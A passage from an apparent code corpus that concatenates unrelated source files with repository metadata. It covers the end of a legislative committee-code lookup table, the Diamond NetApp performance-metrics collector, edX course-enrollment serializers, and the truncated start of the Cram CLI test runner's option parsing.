("Subcommittee on Amendments", "SLGV-SLGA"): "507", ("Subcommittee on Amendments", "SLIC-SLAA"): "508", ("Subcommittee on Amendments", "SNVR-SNVA"): "509", ("Subcommittee on Amendments", "SPHL-SPHA"): "16", ("Subcommittee on Amendments", "SPHL-SPOA"): "16", ("Subcommittee on Amendments", "SPHL-SPSA"): "16", ("Subcommittee on Amendments", "SREV-SRVA"): "512", ("Subcommittee on Amendments", "STRN-STAM"): "18", ("Subcommittee on Amtrak", "STRN-STAK"): "903", ("Subcommittee on Animal Welfare", "SAGR-SAAW"): "513", ("Subcommittee on Annexation", "SLGV-SLGN"): "514", ("Subcommittee on Bail Reform", "SCCL-SCBR"): "515", ("Subcommittee on CLEAR Compliance", "SCCL-SCCC"): "516", ("Subcommittee on CLEAR Compliance", "SCCL-SCCL"): "516", ("Subcommittee on CLEAR Compliance", "SCCL-SCLR"): "516", ("Subcommittee on Campaign Finance", "SEXC-SECF"): "519", ("Subcommittee on Capital (AP)", "SAPB-SACP"): "1100", ("Subcommittee on Capital (TR)", "STRN-STOC"): "1102", ("Subcommittee on Charter Schools", "SESE-SBCS"): "520", ("Subcommittee on Charter Schools", "SESE-SECS"): "520", ("Subcommittee on Charter Schools", "SESE-SSCR"): "520", ("Subcommittee on Civil Rights", "SEXC-SECR"): "25", ("Subcommittee on Civil Rights", "SEXC-SSCR"): "25", ("Subcommittee on Civil Rights", "SEXC-SXCR"): "25", ("Subcommittee on Civil Rights", "SJUD-SJCR"): "522", ("Subcommittee on Climate Change", "SENV-SENC"): "26", ("Subcommittee on Coal Mining", "SAGR-SACM"): "523", ("Subcommittee on Consolidation", "SLGV-SLCC"): "524", ("Subcommittee on Const. Amendments", "SEXC-SECA"): "86", ("Subcommittee on Const. Amendments", "SEXC-SXCA"): "86", ("Subcommittee on Consumer Protection", "SCOM-SCCP"): "914", ("Subcommittee on Court Fees & Fines", "SJUD-SCFF"): "525", ("Subcommittee on Cryptocurrencies", "SREV-SCCC"): "527", ("Subcommittee on Cybersecurity", "STIT-STIC"): "526", ("Subcommittee on Deregulation", "SENV-SEND"): "905", ("Subcommittee on Education", "SEXC-EXED"): "73", ("Subcommittee on Election Law", "SEXC-SBEL"): "29", ("Subcommittee on Election Law", "SEXC-SEEL"): "29", ("Subcommittee on Election Law", "SEXC-SSEL"): "29", ("Subcommittee on Election Reform", "SELC-SEER"): "529", ("Subcommittee on Employment Issues", "SLAB-SLEI"): "530", ("Subcommittee on Ethics", "SEXC-SXET"): "930", ("Subcommittee on Federal Taxes", "SREV-SCFT"): "194", ("Subcommittee on Firearms (CL)", "SCCL-SCFA"): "168", ("Subcommittee on Firearms (JU)", "SJUD-SSFA"): "531", ("Subcommittee on Firearms", "SJUD-SJFA"): "531", ("Subcommittee on Firearms", "SJUD-SJSF"): "531", ("Subcommittee on Food Labeling", "SAGR-SAFL"): "900", ("Subcommittee on Fracking", "SNVR-SESF"): "31", ("Subcommittee on Gaming Activities", "SGAM-SGGA"): "537", ("Subcommittee on Gaming", "SEXC-SEOG"): "210", ("Subcommittee on Gaming", "SEXC-SESG"): "210", ("Subcommittee on Gaming", "SEXC-SSGA"): "210", ("Subcommittee on Gov. Operations", "SEXC-SEGO"): "32", ("Subcommittee on Health Exchanges", "SINS-SIHE"): "538", ("Subcommittee on Housing", "SHCA-SCHO"): "539", ("Subcommittee on Immunization", "SPHL-SPOI"): "540", ("Subcommittee on Immunizations", "SPHL-PSOI"): "540", ("Subcommittee on Income Taxes", "SREV-SRIT"): "541", ("Subcommittee on Information Sharing", "SREV-SSIS"): "542", ("Subcommittee on Insurance Mandates", "SINS-SCIM"): "28", ("Subcommittee on Insurance Mandates", "SINS-SINM"): "28", ("Subcommittee on Lic.Professionals", "SLIC-SLLP"): "544", ("Subcommittee on Long Term Care", "SPHL-SPLT"): "545", ("Subcommittee on Mandates", "SESE-SEDM"): "546", ("Subcommittee on Medicaid", "SHHS-SHHM"): "547", ("Subcommittee on Mortgages", "SFIC-SFMG"): "548", ("Subcommittee on NCLB", "SESE-NLCB"): "36", ("Subcommittee on Natural Resources", "SENE-SENR"): "37", ("Subcommittee on New Districts", "SLGV-SGND"): "550", ("Subcommittee on Payday Loan Reform", "SFIC-SFPL"): "38", ("Subcommittee on Payday Loans", "SFIC-SFPD"): "38", ("Subcommittee on Pension Reform", "SPAI-SPPR"): "551", ("Subcommittee on Pension Reforms", "SPAI-SPIP"): "551", ("Subcommittee on Pensions", "SEXC-SEPE"): "553", ("Subcommittee on Prison Operation", "SGOA-SCPO"): "554", ("Subcommittee on Procedures", "SLGV-SLGP"): "555", ("Subcommittee on Procurement", "SEXC-SESP"): "556", ("Subcommittee on Procurement", "SEXC-SSOP"): "556", ("Subcommittee on Program Expansions", "SCHE-SHPE"): "558", ("Subcommittee on Property Tax", "SREV-SRPT"): "43", ("Subcommittee on Property Tax", "SREV-SUPT"): "43", ("Subcommittee on Property Taxes", "SREV-SRPR"): "43", ("Subcommittee on Property Taxes", "SREV-SRPT"): "43", ("Subcommittee on Public Safety", "SLGV-SLPS"): "561", ("Subcommittee on Railroad Safety", "STRN-SRRS"): "562", ("Subcommittee on Readiness", "SENE-SENR"): "908", ("Subcommittee on Red Light Cameras", "STRN-SRLC"): "563", ("Subcommittee on Redistricting I", "SRED-RRDI"): "564", ("Subcommittee on Redistricting II", "SRED-RRII"): "565", ("Subcommittee on Regulatory Reform", "SEXC-SERR"): "45", ("Subcommittee on Resolutions", "SGOA-SSUR"): "566", ("Subcommittee on Restorative Justice", "SEXC-SERJ"): "910", ("Subcommittee on Sales Taxes", "SREV-SRST"): "567", ("Subcommittee on Special Issues (AP)", "SAPB-SASI"): "571", ("Subcommittee on Special Issues (CE)", "SCED-SCSI"): "572", ("Subcommittee on Special Issues (CL)", "SCCL-SCLS"): "69", ("Subcommittee on Special Issues (CL)", "SCCL-SCSI"): "69", ("Subcommittee on Special Issues (CL)", "SCCL-SSSI"): "69", ("Subcommittee on Special Issues (EC)", "SNVR-SESI"): "587", ("Subcommittee on Special Issues (ED)", "SESE-SBSI"): "48", ("Subcommittee on Special Issues (ED)", "SESE-SESI"): "48", ("Subcommittee on Special Issues (ED)", "SESE-SSSI"): "48", ("Subcommittee on Special Issues (EN)", "SENE-SESI"): "57", ("Subcommittee on Special Issues (EX)", "SEXC-SESI"): "58", ("Subcommittee on Special Issues (EX)", "SEXC-SSSI"): "58", ("Subcommittee on Special Issues (GR)", "SGRM-SGRS"): "577", ("Subcommittee on Special Issues (HS)", "SHHS-HSSI"): "578", ("Subcommittee on Special Issues (HS)", "SHHS-SSSI"): "578", ("Subcommittee on Special Issues (IN)", "SINS-SISI"): "580", ("Subcommittee on Special Issues (JU)", "SJUD-SSSI"): "581", ("Subcommittee on Special Issues (LA)", "SLAB-SLAS"): "19", ("Subcommittee on Special Issues (LA)", "SLIC-LASI"): "51", ("Subcommittee on Special Issues (LA)", "SLIC-SLSI"): "51", ("Subcommittee on Special Issues (LB)", "SLAB-SLSI"): "19", ("Subcommittee on Special Issues (LC)", "SLAB-SLSI"): "19", ("Subcommittee on Special Issues (LG)", "SLGV-SLCS"): "13", ("Subcommittee on Special Issues (LG)", "SLGV-SLGS"): "13", ("Subcommittee on Special Issues (LG)", "SLGV-SLSI"): "13", ("Subcommittee on Special Issues (PH)", "SPHL-SPHI"): "17", ("Subcommittee on Special Issues (PH)", "SPHL-SPSI"): "17", ("Subcommittee on Special Issues (RV)", "SREV-SRSI"): "65", ("Subcommittee on Special Issues (RV)", "SREV-SSSI"): "65", ("Subcommittee on Special Issues (SE)", "SENE-SESI"): "57", ("Subcommittee on Special Issues (SG)", "SGOA-SGSI"): "585", ("Subcommittee on Special Issues (SG)", "SGOA-SOSI"): "585", ("Subcommittee on Special Issues (SN)", "SNVR-SNSI"): "587", ("Subcommittee on Special Issues (ST)", "STRN-STSI"): "74", ("Subcommittee on Special Issues (TR)", "STRN-STSI"): "74", ("Subcommittee on Special Issues (TR)", "STRN-STTI"): "74", ("Subcommittee on Special Issues", "SCCL-SCSI"): "69", ("Subcommittee on Special Issues", "SCCP-SCPI"): "1002", ("Subcommittee on Special Issues", "SESE-SESI"): "48", ("Subcommittee on Special Issues", "SEXC-SXSI"): "568", ("Subcommittee on Special Issues", "SHHS-SHSI"): "569", ("Subcommittee on Special Issues", "SLAB-SLAI"): "19", ("Subcommittee on Special Issues", "SLIC-SLSI"): "51", ("Subcommittee on Special Issues", "SLIC-SLSS"): "51", ("Subcommittee on Special Issues", "SPHL-SPHS"): "17", ("Subcommittee on Special Issues", "SPHL-SPSI"): "17", ("Subcommittee on Special Issues", "SREV-SRSI"): "65", ("Subcommittee on Special Issues", "SREV-SRVS"): "65", ("Subcommittee on St. Gov Operations", "SEXC-SESG"): "589", ("Subcommittee on State & Local Govt.", "SEXC-SXLG"): "206", ("Subcommittee on State Designations", "SGOA-SGSD"): "591", ("Subcommittee on State Regulation", "SGAM-SGSR"): "592", ("Subcommittee on Tax Credits", "SREV-SRTC"): "593", ("Subcommittee on Tax Credits", "SREV-SSTC"): "593", ("Subcommittee on Tollways", "STRN-STOL"): "595", ("Subcommittee on Tort Reform", "SJUD-SJTR"): "596", ("Subcommittee on Tourism", "SREV-SRTM"): "597", ("Subcommittee on Transparency", "SENE-SENT"): "598", ("Substance Abuse Special", "HSSA"): "599", ("Substance Abuse Subcommittee", "HMEH-ABUS"): "600", ("Supplier Diversity, Special Com. On", "SCSD"): "623", ("Tax Policy: Business Climate Sub", "HREF-TAXB"): "601", ("Tax Policy: Business Climate Sub", "HSGA-TAXB"): "602", ("Tax Policy: Income Tax Subcommittee", "HSGA-TAXI"): "603", ("Tax Policy: Other Taxes Subcommitte", "HREF-TAXO"): "604", ("Tax Policy: Other Taxes Subcommitte", "HSGA-TAXO"): "605", ("Tax Policy: Sales Tax Subcommittee", "HREF-TASA"): "606", ("Tax Policy: Sales Tax Subcommittee", "HSGA-TAXS"): "607", ("Tax Sales Subcommittee", "HREF-TAXS"): "608", ("Taxi Policy: Income Tax Subcommitte", "HREF-TAXI"): "1003", ("Telecommunications & InfoTechnology", "STIT"): "610", ("Telecommunications & Technology", "STEL"): "611", ("Telecommunications Committee", "HTEL"): "75", ("Telecommunications", "HTEL"): "75", ("Telecommunications, Subcommittee on", "HPUB-TELE"): "612", ("Tollway Oversight Review Subcommitt", "HTOL-TOLL"): "614", ("Tollway Oversight", "HTOL"): "613", ("Tort Liability Law Subcommittee", "HJUA-TLLS"): "615", ("Tort Liability Subcommittee", "HJUA-JTOL"): "615", ("Tourism & Conventions", "HTOR"): "77", ("Tourism", "HTOR"): "77", ("Tourism, Hospitality & Craft Ind.", "HTHC"): "616", ("Towing Oversight Subcommittee", "HREF-HTOW"): "78", ("Towing Oversight Subcommittee", "HREF-TOWO"): "78", ("Trans Subcommittee Special Issues", "STRN-STSI"): "74", ("Trans. Regulation Accountability", "HTRR-TRAS"): "79", ("Trans. Subcommittee on Amendments", "STRN-STRA"): "11", ("Transit Management and Performance", "HMAS-TMAP"): "617", ("Transit, Subcommittee on", "HHUD-TRAN"): "618", ("Transparency Subcommittee", "HCOT-TRAN"): "619", ("Transportation & Motor Vehicles", "HTRN"): "621", ("Transportation Reg. and Reg. Subcom", "HTRR-TRRS"): "622", ("Transportation Subcomm. Amendments", "STRN-STRA"): "11", ("Transportation Subcomm. Spec. Issue", "STRN-STSI"): "74", ("Transportation Subcommittee", "HAPP-STRA"): "624", ("Transportation", "STRN"): "620", ("Transportation, Regulation, Roads", "HTRR"): "80", ("Transportation: License Plates Subc", "HVES-HLPS"): "625", ("Transportation: License Plates", "HVES-TRLP"): "625", ("Transportation: Railroad & Air Subc", "HTRR-HRRA"): "384", ("Transportation: Railroad and Air", "HTRR-TRAS"): "384", ("Transportation: Reg. & Reg. Sub.", "HTRR-HRRS"): "622", ("Transportation: Regis and Regu", "HTRR-TRES"): "622", ("Transportation: Regulation, Roads", "HTRR"): "80", ("Transportation: Signs & Signals Sub", "HVES-HSSS"): "630", ("Transportation: Signs", "HVES-TRSI"): "630", ("Transportation: Vehicles & Safety", "HVES"): "83", ("Trusts & Estates Law Subcommittee", "HJUA-TELS"): "632", ("Unemployment Insurance Subcommittee", "HLBR-HUIN"): "634", ("Unemployment Insurance Subcommittee", "HLBR-UEMP"): "634", ("Unemployment Insurance Subcommittee", "HLBR-UINS"): "634", ("Unemployment Insurance Subcommittee", "HLBR-UNEM"): "634", ("Vehicles & Safety", "HVES"): "83", ("Veterans Affairs", "HVET"): "87", ("Veterans Affairs", "SVET"): "637", ("Voter Education & Registration Sub", "HELE-VERS"): "638", ("Wage Policy and Study Subcommittee", "HLBR-LWPS"): "1131", ("Water Quality & Quantity, Subcom", "HENE-WATR"): "88", ("Water Subcommittee", "HENE-SWTR"): "88", ("Water", "HENE-WATE"): "88", ("Welfare", "SHHS-SHHW"): "640", ("Whole, Committee of the", "HCWL"): "34", ("Workers Comp Unemploy Insurance", "HLBR-WCUI"): "91", ("Workers Comp. and Unemployment Ins.", "HLBR-WCUI"): "91", ("Workers Compensation Subcommittee", "HLBR-HWCO"): "641", ("Workers Compensation Subcommittee", "HLBR-WKCO"): "641", ("Workforce Development Subcommittee", "HLBR-LWDS"): "1132", ("Workforce Reconciliation Subcommitt", "HLBR-HWOR"): "40", ("Workforce Reconciliation Subcommitt", "HLBR-WORE"): "40", ("Workforce Reconciliation Subcommitt", "HLBR-WORK"): "40", ("Youth & Young Adults", "HYYA"): "646", ("Youth and Family", "HYOF"): "647", }
gpl-3.0
CYBERBUGJR/Diamond
src/collectors/netapp/netapp.py
6
16305
# coding=utf-8 """ The NetAppCollector collects metric from a NetApp installation using the NetApp Manageability SDK. This allows access to many metrics not available via SNMP. For this to work you'll the SDK available on the system. This module has been developed using v5.0 of the SDK. As of writing the SDK can be found at https://communities.netapp.com/docs/DOC-1152 You'll also need to specify which NetApp instances the collecter should get data from. Example NetAppCollector.conf: ``` enabled = True path_prefix = netapp [devices] [[na_filer]] ip = 123.123.123.123 user = root password = strongpassword ```` The primary source for documentation about the API has been "NetApp unified storage performance management using open interfaces" https://communities.netapp.com/docs/DOC-1044 """ import sys import time import re import unicodedata from diamond.metric import Metric import diamond.convertor class NetAppCollector(diamond.collector.Collector): # This is the list of metrics to collect. # This is a dict of lists with tuples, which is parsed as such: # The dict name is the object name in the NetApp API. # For each object we have a list of metrics to retrieve. # Each tuple is built like this; # ("metric name in netapp api", "output name of metric", multiplier) # The purpose of the output name is to enable replacement of reported # metric names, since some the names in the API can be confusing. # The purpose of the multiplier is to scale all metrics to a common # scale, which is latencies in milliseconds, and data in bytes per sec. # This is needed since the API will return a mixture of percentages, # nanoseconds, milliseconds, bytes and kilobytes. METRICS = { 'aggregate': [ ("user_reads", "user_read_iops", 1), ("user_writes", "user_write_iops", 1) ], 'disk': [ ("disk_busy", "disk_busy_pct", 100), ("base_for_disk_busy", "base_for_disk_busy", 1), ("user_read_blocks", "user_read_blocks_per_sec", 1), ("user_write_blocks", "user_write_blocks_per_sec", 1), ("user_read_latency", "user_read_latency", 0.001), ("user_write_latency", "user_write_latency", 0.001) ], 'ifnet': [ ("send_data", "tx_bytes_per_sec", 1), ("recv_data", "rx_bytes_per_sec", 1) ], 'lun': [ ("total_ops", "total_iops", 1), ("read_ops", "read_iops", 1), ("write_ops", "write_iops", 1), ("avg_latency", "avg_latency", 1) ], 'processor': [ ("processor_busy", "processor_busy_pct", 100), ("processor_elapsed_time", "processor_elapsed_time", 1) ], 'system': [ ("nfs_ops", "nfs_iops", 1), ("cifs_ops", "cifs_iops", 1), ("http_ops", "http_iops", 1), ("fcp_ops", "fcp_iops", 1), ("http_ops", "http_iops", 1), ("iscsi_ops", "iscsi_iops", 1), ("read_ops", "read_iops", 1), ("write_ops", "write_iops", 1), ("total_ops", "total_iops", 1), ("cpu_elapsed_time", "cpu_elapsed_time", 1), ("total_processor_busy", "total_processor_busy_pct", 100), ("avg_processor_busy", "avg_processor_busy_pct", 100), ("net_data_recv", "total_rx_bytes_per_sec", 1000), ("net_data_sent", "total_tx_bytes_per_sec", 1000), ("disk_data_read", "total_read_bytes_per_sec", 1000), ("disk_data_written", "total_write_bytes_per_sec", 1000), ("sys_read_latency", "sys_read_latency", 1), ("sys_write_latency", "sys_write_latency", 1), ("sys_avg_latency", "sys_avg_latency", 1) ], 'vfiler': [ ("vfiler_cpu_busy", "cpu_busy_pct", 100), ("vfiler_cpu_busy_base", "cpu_busy_base", 1), ("vfiler_net_data_recv", "rx_bytes_per_sec", 1000), ("vfiler_net_data_sent", "tx_bytes_per_sec", 1000), ("vfiler_read_ops", "read_iops", 1), ("vfiler_write_ops", "write_iops", 1), ("vfiler_read_bytes", "read_bytes_per_sec", 1000), ("vfiler_write_bytes", "write_bytes_per_sec", 1000), ], 'volume': [ ("total_ops", "total_iops", 1), ("avg_latency", "avg_latency", 0.001), ("read_ops", "read_iops", 1), ("write_ops", "write_iops", 1), ("read_latency", "read_latency", 0.001), ("write_latency", "write_latency", 0.001), ("read_data", "read_bytes_per_sec", 1), ("write_data", "write_bytes_per_sec", 1), ("cifs_read_data", "cifs_read_bytes_per_sec", 1), ("cifs_write_data", "cifs_write_bytes_per_sec", 1), ("cifs_read_latency", "cifs_read_latency", 0.001), ("cifs_write_latency", "cifs_write_latency", 0.001), ("cifs_read_ops", "cifs_read_iops", 1), ("cifs_write_ops", "cifs_write_iops", 1), ("fcp_read_data", "fcp_read_bytes_per_sec", 1), ("fcp_write_data", "fcp_write_bytes_per_sec", 1), ("fcp_read_latency", "fcp_read_latency", 0.001), ("fcp_write_latency", "fcp_write_latency", 0.001), ("fcp_read_ops", "fcp_read_iops", 1), ("fcp_write_ops", "fcp_write_iops", 1), ("iscsi_read_data", "iscsi_read_bytes_per_sec", 1), ("iscsi_write_data", "iscsi_write_bytes_per_sec", 1), ("iscsi_read_latency", "iscsi_read_latency", 0.001), ("iscsi_write_latency", "iscsi_write_latency", 0.001), ("iscsi_read_ops", "iscsi_read_iops", 1), ("iscsi_write_ops", "iscsi_write_iops", 1), ("nfs_read_data", "nfs_read_bytes_per_sec", 1), ("nfs_write_data", "nfs_write_bytes_per_sec", 1), ("nfs_read_latency", "nfs_read_latency", 0.001), ("nfs_write_latency", "nfs_write_latency", 0.001), ("nfs_read_ops", "nfs_read_iops", 1), ("nfs_write_ops", "nfs_write_iops", 1) ], } # For some metrics we need to divide one value from the API with another. # This is a key-value list of the connected values. DIVIDERS = { "avg_latency": "total_ops", "read_latency": "read_ops", "write_latency": "write_ops", "sys_avg_latency": "total_ops", "sys_read_latency": "read_ops", "sys_write_latency": "write_ops", "cifs_read_latency": "cifs_read_ops", "cifs_write_latency": "cifs_write_ops", "fcp_read_latency": "fcp_read_ops", "fcp_write_latency": "fcp_write_ops", "iscsi_read_latency": "iscsi_read_ops", "iscsi_write_latency": "iscsi_write_ops", "nfs_read_latency": "nfs_read_ops", "nfs_write_latency": "nfs_write_ops", "user_read_latency": "user_read_blocks", "user_write_latency": "user_write_blocks", "total_processor_busy": "cpu_elapsed_time", "avg_processor_busy": "cpu_elapsed_time", "processor_busy": "processor_elapsed_time", "disk_busy": "base_for_disk_busy", "vfiler_cpu_busy": "vfiler_cpu_busy_base", } # Some metrics are collected simply to calculate other metrics. # These should not be reported. DROPMETRICS = [ "cpu_elapsed_time", "processor_elapsed_time", "base_for_disk_busy", "vfiler_cpu_busy_base", ] # Since we might have large collections collected often, # we need a pretty good time_delta. # We'll use a dict for this, keeping time_delta for each object. LastCollectTime = {} def get_default_config_help(self): config_help = super(NetAppCollector, self).get_default_config_help() return config_help def get_default_config(self): default_config = super(NetAppCollector, self).get_default_config() default_config['path_prefix'] = "netapp" default_config['netappsdkpath'] = "/opt/netapp/lib/python/NetApp" return default_config def _replace_and_publish(self, path, prettyname, value, device): """ Inputs a complete path for a metric and a value. Replace the metric name and publish. """ if value is None: return newpath = path # Change metric name before publish if needed. newpath = ".".join([".".join(path.split(".")[:-1]), prettyname]) metric = Metric(newpath, value, precision=4, host=device) self.publish_metric(metric) def _gen_delta_depend(self, path, derivative, multiplier, prettyname, device): """ For some metrics we need to divide the delta for one metric with the delta of another. Publishes a metric if the convertion goes well. """ primary_delta = derivative[path] shortpath = ".".join(path.split(".")[:-1]) basename = path.split(".")[-1] secondary_delta = None if basename in self.DIVIDERS.keys(): mateKey = ".".join([shortpath, self.DIVIDERS[basename]]) else: return if mateKey in derivative.keys(): secondary_delta = derivative[mateKey] else: return # If we find a corresponding secondary_delta, publish a metric if primary_delta > 0 and secondary_delta > 0: value = (float(primary_delta) / secondary_delta) * multiplier self._replace_and_publish(path, prettyname, value, device) def _gen_delta_per_sec(self, path, value_delta, time_delta, multiplier, prettyname, device): """ Calulates the difference between to point, and scales is to per second. """ if time_delta < 0: return value = (value_delta / time_delta) * multiplier # Only publish if there is any data. # This helps keep unused metrics out of Graphite if value > 0.0: self._replace_and_publish(path, prettyname, value, device) def collect(self, device, ip, user, password): """ This function collects the metrics for one filer. """ sys.path.append(self.config['netappsdkpath']) try: import NaServer except ImportError: self.log.error("Unable to load NetApp SDK from %s" % ( self.config['netappsdkpath'])) return # Set up the parameters server = NaServer.NaServer(ip, 1, 3) server.set_transport_type('HTTPS') server.set_style('LOGIN') server.set_admin_user(user, password) # We're only able to query a single object at a time, # so we'll loop over the objects. for na_object in self.METRICS.keys(): # For easy reference later, generate a new dict for this object LOCALMETRICS = {} for metric in self.METRICS[na_object]: metricname, prettyname, multiplier = metric LOCALMETRICS[metricname] = {} LOCALMETRICS[metricname]["prettyname"] = prettyname LOCALMETRICS[metricname]["multiplier"] = multiplier # Keep track of how long has passed since we checked last CollectTime = time.time() time_delta = None if na_object in self.LastCollectTime.keys(): time_delta = CollectTime - self.LastCollectTime[na_object] self.LastCollectTime[na_object] = CollectTime self.log.debug("Collecting metric of object %s" % na_object) query = NaServer.NaElement("perf-object-get-instances-iter-start") query.child_add_string("objectname", na_object) counters = NaServer.NaElement("counters") for metric in LOCALMETRICS.keys(): counters.child_add_string("counter", metric) query.child_add(counters) res = server.invoke_elem(query) if(res.results_status() == "failed"): self.log.error("Connection to filer %s failed; %s" % ( device, res.results_reason())) return iter_tag = res.child_get_string("tag") num_records = 1 max_records = 100 # For some metrics there are dependencies between metrics for # a single object, so we'll need to collect all, so we can do # calculations later. raw = {} while(num_records != 0): query = NaServer.NaElement( "perf-object-get-instances-iter-next") query.child_add_string("tag", iter_tag) query.child_add_string("maximum", max_records) res = server.invoke_elem(query) if(res.results_status() == "failed"): print "Connection to filer %s failed; %s" % ( device, res.results_reason()) return num_records = res.child_get_int("records") if(num_records > 0): instances_list = res.child_get("instances") instances = instances_list.children_get() for instance in instances: raw_name = unicodedata.normalize( 'NFKD', instance.child_get_string("name")).encode( 'ascii', 'ignore') # Shorten the name for disks as they are very long and # padded with zeroes, eg: # 5000C500:3A236B0B:00000000:00000000:00000000:... if na_object is "disk": non_zero_blocks = [ block for block in raw_name.split(":") if block != "00000000" ] raw_name = "".join(non_zero_blocks) instance_name = re.sub(r'\W', '_', raw_name) counters_list = instance.child_get("counters") counters = counters_list.children_get() for counter in counters: metricname = unicodedata.normalize( 'NFKD', counter.child_get_string("name")).encode( 'ascii', 'ignore') metricvalue = counter.child_get_string("value") # We'll need a long complete pathname to not # confuse self.derivative pathname = ".".join([self.config["path_prefix"], device, na_object, instance_name, metricname]) raw[pathname] = int(metricvalue) # Do the math self.log.debug("Processing %i metrics for object %s" % (len(raw), na_object)) # Since the derivative function both returns the derivative # and saves a new point, we'll need to store all derivatives # for local reference. derivative = {} for key in raw.keys(): derivative[key] = self.derivative(key, raw[key]) for key in raw.keys(): metricname = key.split(".")[-1] prettyname = LOCALMETRICS[metricname]["prettyname"] multiplier = LOCALMETRICS[metricname]["multiplier"] if metricname in self.DROPMETRICS: continue elif metricname in self.DIVIDERS.keys(): self._gen_delta_depend(key, derivative, multiplier, prettyname, device) else: self._gen_delta_per_sec(key, derivative[key], time_delta, multiplier, prettyname, device)
mit
doismellburning/edx-platform
common/djangoapps/enrollment/serializers.py
6
3423
""" Serializers for all Course Enrollment related return objects. """ import logging from rest_framework import serializers from course_modes.models import CourseMode from student.models import CourseEnrollment log = logging.getLogger(__name__) class StringListField(serializers.CharField): """Custom Serializer for turning a comma delimited string into a list. This field is designed to take a string such as "1,2,3" and turn it into an actual list [1,2,3] """ def field_to_native(self, obj, field_name): """ Serialize the object's class name. """ if not obj.suggested_prices: return [] items = obj.suggested_prices.split(',') return [int(item) for item in items] class CourseSerializer(serializers.Serializer): # pylint: disable=abstract-method """ Serialize a course descriptor and related information. """ course_id = serializers.CharField(source="id") enrollment_start = serializers.DateTimeField(format=None) enrollment_end = serializers.DateTimeField(format=None) course_start = serializers.DateTimeField(source="start", format=None) course_end = serializers.DateTimeField(source="end", format=None) invite_only = serializers.BooleanField(source="invitation_only") course_modes = serializers.SerializerMethodField() def __init__(self, *args, **kwargs): self.include_expired = kwargs.pop("include_expired", False) super(CourseSerializer, self).__init__(*args, **kwargs) def get_course_modes(self, obj): """ Retrieve course modes associated with the course. """ course_modes = CourseMode.modes_for_course( obj.id, include_expired=self.include_expired, only_selectable=False ) return [ ModeSerializer(mode).data for mode in course_modes ] class CourseEnrollmentSerializer(serializers.ModelSerializer): """Serializes CourseEnrollment models Aggregates all data from the Course Enrollment table, and pulls in the serialization for the Course Descriptor and course modes, to give a complete representation of course enrollment. """ course_details = CourseSerializer(source="course_overview") user = serializers.SerializerMethodField('get_username') def get_username(self, model): """Retrieves the username from the associated model.""" return model.username class Meta(object): # pylint: disable=missing-docstring model = CourseEnrollment fields = ('created', 'mode', 'is_active', 'course_details', 'user') lookup_field = 'username' class ModeSerializer(serializers.Serializer): """Serializes a course's 'Mode' tuples Returns a serialized representation of the modes available for course enrollment. The course modes models are designed to return a tuple instead of the model object itself. This serializer does not handle the model object itself, but the tuple. """ slug = serializers.CharField(max_length=100) name = serializers.CharField(max_length=255) min_price = serializers.IntegerField() suggested_prices = StringListField(max_length=255) currency = serializers.CharField(max_length=8) expiration_datetime = serializers.DateTimeField() description = serializers.CharField() sku = serializers.CharField()
agpl-3.0
akopytov/sysbench
third_party/cram/cram/_main.py
2
7967
"""Main entry point""" import optparse import os import shlex import shutil import sys import tempfile try: import configparser except ImportError: # pragma: nocover import ConfigParser as configparser from cram._cli import runcli from cram._encoding import b, fsencode, stderrb, stdoutb from cram._run import runtests from cram._xunit import runxunit def _which(cmd): """Return the path to cmd or None if not found""" cmd = fsencode(cmd) for p in os.environ['PATH'].split(os.pathsep): path = os.path.join(fsencode(p), cmd) if os.path.isfile(path) and os.access(path, os.X_OK): return os.path.abspath(path) return None def _expandpath(path): """Expands ~ and environment variables in path""" return os.path.expanduser(os.path.expandvars(path)) class _OptionParser(optparse.OptionParser): """Like optparse.OptionParser, but supports setting values through CRAM= and .cramrc.""" def __init__(self, *args, **kwargs): self._config_opts = {} optparse.OptionParser.__init__(self, *args, **kwargs) def add_option(self, *args, **kwargs): option = optparse.OptionParser.add_option(self, *args, **kwargs) if option.dest and option.dest != 'version': key = option.dest.replace('_', '-') self._config_opts[key] = option.action == 'store_true' return option def parse_args(self, args=None, values=None): config = configparser.RawConfigParser() config.read(_expandpath(os.environ.get('CRAMRC', '.cramrc'))) defaults = {} for key, isbool in self._config_opts.items(): try: if isbool: try: value = config.getboolean('cram', key) except ValueError: value = config.get('cram', key) self.error('--%s: invalid boolean value: %r' % (key, value)) else: value = config.get('cram', key) except (configparser.NoSectionError, configparser.NoOptionError): pass else: defaults[key] = value self.set_defaults(**defaults) eargs = os.environ.get('CRAM', '').strip() if eargs: args = args or [] args += shlex.split(eargs) try: return optparse.OptionParser.parse_args(self, args, values) except optparse.OptionValueError: self.error(str(sys.exc_info()[1])) def _parseopts(args): """Parse command line arguments""" p = _OptionParser(usage='cram [OPTIONS] TESTS...', prog='cram') p.add_option('-V', '--version', action='store_true', help='show version information and exit') p.add_option('-q', '--quiet', action='store_true', help="don't print diffs") p.add_option('-v', '--verbose', action='store_true', help='show filenames and test status') p.add_option('-i', '--interactive', action='store_true', help='interactively merge changed test output') p.add_option('-d', '--debug', action='store_true', help='write script output directly to the terminal') p.add_option('-y', '--yes', action='store_true', help='answer yes to all questions') p.add_option('-n', '--no', action='store_true', help='answer no to all questions') p.add_option('-E', '--preserve-env', action='store_true', help="don't reset common environment variables") p.add_option('-e', '--no-err-files', action='store_true', help="don't write .err files on test failures") p.add_option('--keep-tmpdir', action='store_true', help='keep temporary directories') p.add_option('--shell', action='store', default='/bin/sh', metavar='PATH', help='shell to use for running tests (default: %default)') p.add_option('--shell-opts', action='store', metavar='OPTS', help='arguments to invoke shell with') p.add_option('--indent', action='store', default=2, metavar='NUM', type='int', help=('number of spaces to use for indentation ' '(default: %default)')) p.add_option('--xunit-file', action='store', metavar='PATH', help='path to write xUnit XML output') opts, paths = p.parse_args(args) paths = [fsencode(path) for path in paths] return opts, paths, p.get_usage def main(args): """Main entry point. If you're thinking of using Cram in other Python code (e.g., unit tests), consider using the test() or testfile() functions instead. :param args: Script arguments (excluding script name) :type args: str :return: Exit code (non-zero on failure) :rtype: int """ opts, paths, getusage = _parseopts(args) if opts.version: sys.stdout.write("""Cram CLI testing framework (version 0.7) Copyright (C) 2010-2016 Brodie Rao <brodie@bitheap.org> and others This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. """) return conflicts = [('--yes', opts.yes, '--no', opts.no), ('--quiet', opts.quiet, '--interactive', opts.interactive), ('--debug', opts.debug, '--quiet', opts.quiet), ('--debug', opts.debug, '--interactive', opts.interactive), ('--debug', opts.debug, '--verbose', opts.verbose), ('--debug', 